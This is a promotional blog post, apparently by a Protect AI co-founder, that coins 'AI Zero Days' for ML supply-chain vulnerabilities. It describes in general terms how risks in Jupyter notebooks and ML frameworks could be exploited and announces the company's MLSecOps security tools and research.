MLSecOps

AI Zero Days: Why we need MLSecOps, now.

•

8 min read

•

October 21, 2022

Day 1…

Customers have been the focus of my career in almost every role I have had. Prior to joining and co-founding Protect AI, I had the honor of being able to lead a team of some of the brightest and most talented, customer facing engineers in the AI and ML industry, at Amazon Web Services. That tenure included a massive effort between customers (often many who were competitors in their own industries) and suppliers (some of who competed directly with AWS) to make MLOps an industry standard practice to more effectively scale AI workloads and accelerate ML development. As their systems grew in sophistication, complexity, and use, novel issues and challenges surfaced.

In the first days of Protect AI, some of our most advanced build partners shared their “unique AI security challenges.” Some discussed regulatory issues, all talked about ML pipeline oversight problems, and two mentioned the concept of purposeful model manipulation. Those conversations inspired my co-founders and I to survey the landscape of possible unique AI/ML cybersecurity issues. Our research unearthed considerable opportunities for hackers, nation states, and other threat actors to do considerable harm by taking advantage of vulnerabilities in the ML software supply chain. We call these supply chain vulnerabilities “AI Zero Days.”

What’s an AI Zero Day (AIØD)?

The term “zero day” is a common cybersecurity term that is usually referred to as a vulnerability in a system or device that has been disclosed but is not yet patched. (Correspondingly, an exploit that attacks a zero-day vulnerability is called a zero-day exploit.) The term "zero-day" refers to the fact that the vendor or developer has only just learned of the flaw – which means they have “zero days'' to fix it. As a result, zero-day vulnerabilities pose a significant risk to software systems as cybercriminals race to exploit these vulnerabilities while others race to patch them and close these holes. Zero days exist in all technology domains, such as mobile operating systems, browsers, or operating system kernels. They exist in AI applications and ML pipelines, too.

AIØDs in ML Supply Chains

Typically, zero day attacks are created by exploiting assets in an application’s or system’s software supply chain. Two notable examples of this in the non-ML category are the Solarwinds attack on the US Government and the Log4j vulnerability that left millions (billions?) of devices open to hackers. Both continue to create problems across the tech landscape. Both represent a type of exploit against software supply chains.

As we explored building our first set of products, we started looking at existing cybersecurity best practices against the ML supply chain and MLOps environments. It was readily apparent that even the most advanced ML companies don't keep detailed inventory lists of every asset and element used in their ML code base. In speaking with hundreds of customers over the course of our founding, customers told us their current scanning tools have blindspots because they aren’t yet adapted to the ML assets and tools used to build AI applications. This makes identifying a similar Log4j like example in ML difficult, if not impossible, using traditional cybersecurity offerings.

These gaps aren’t because people don’t believe this is needed, but rather that current cybersecurity vendors lack context and expertise in ML. Similarly, many ML platform suppliers don’t yet consider their role in the security of ML systems as they are largely assuming that cybersecurity vendors will address this on their behalf. This has created a gap that Protect AI intends to fill.

One of our leading investors and cybersecurity pioneers, Mark Kraynak, stated it well:

“ML is an entirely new class of applications and underlying infrastructure, just like mobile web, IOT, and Web3. Security for new application ecosystems follow the same arc: knowledge of vulnerabilities, followed by the ability to find them, then adding contextual understanding and prioritization, then finally automated remediation. Protect AI will enable this end to end arc for AI systems.”

MLSecOps for Notebooks: Issues in Plain Sight

When evaluating how we could immediately help make ML software supply chains more secure, we started where almost every ML journey does: with Jupyter Notebooks. This core component of the ML supply chain is ripe for exploits and attacks, because of both how pervasive Jupyter Notebooks are in ML code environments and how they are used to exchange and share work among data scientists. Most application developers now consider security risks and think about mitigating them as a natural part of their work, and hold the responsibility of secure code in high regard. But, many cybersecurity and ML customers have told us that their data scientists and ML engineers do not yet have the consideration of security at the forefront of their workflow. From an industry perspective, just look at the recent release of Chat-GPT and the myriad of threat prompt research. Clearly, security may not have been top of mind when releasing this foundational model code. While Chat-GPT is an advanced example of new AI cybersecurity risks, simple exploits in ML code can be easily created, and unintentionally missed.

Consider Remote Code Execution (RCE) flaws in a traditional web application which usually require finding specific entry points and abusing an application. In Jupyter, RCE is as simple as getting a user to import a package. Jupyter environments often have elevated computing abilities. For example, a compromised package could embed malicious code into all models trained by a particular host, leaking all inference data to an unknown location. A compromised package running in Jupyter is just one example of the security holes that exist in a ML supply chain today.

Beyond Notebooks: Securing the ML Supply Chain

The start of MLSecOps in notebooks is just that: A start. Protect AI will be creating more industry-first and industry-leading security tools for ML, novel exploit and threat research of AI systems, and community leadership to drive the industry transition from MLOps to MLSecOps. Recently, PyTorch and TensorFlow had new CVEs released that could facilitate classic cyber attacks such as denial of service and buffer overflow exploits. When one considers how prevalent these two frameworks are in MLOps pipelines one easily grasps the potential opportunity for attackers to hit a company in a new, unexpected realm: ML pipelines and AI systems.

This is why we are building products to protect you against these new risks, using tools that are optimized for AI/ML practitioners, while contextualizing the security needs familiar to cybersecurity professionals. Our company's leadership has spent their careers in this space, and know the different needs and workflows unique to a data scientist, ML engineer, and cybersecurity professional. We are building tools that extend the core technology each role is already using to accelerate adoption and improve the security posture of AI systems at each stage in the ML lifecycle.

We will complement these tools with the industry’s broadest and deepest research of unique ML supply chain threats and AIØDs– exposing much of our research work to help the ethical hacking community understand how to make these systems more secure. Helping guide this effort are leading cybersecurity advisors, and new ML-focused threat researchers who have joined this organization, with more to be announced.

Most importantly, our efforts will not be pursued alone. The primary differentiator in our approach to ML model and AI system security is one of collaboration: with individuals and companies, and between our peers, fellow travelers, and competitors alike. It’s humbling to see the outpouring of encouragement and excitement for our mission to build the standard in enabling MLSecOps for the AI industry. This is a typical BHAG (Big Hairy Audacious Goal) that’s going to require a collective effort of companies large and small, and with AI developers and cybersecurity practitioners, leaders, and developers from across the skills spectrum contributing to this rapidly evolving space of “ML cybersecurity,” and MLSecOps. We are committed to leading this community.

I hope you will join us in this journey to help move the industry forward on MLSecOps.

Sincerely,

#MLSecOps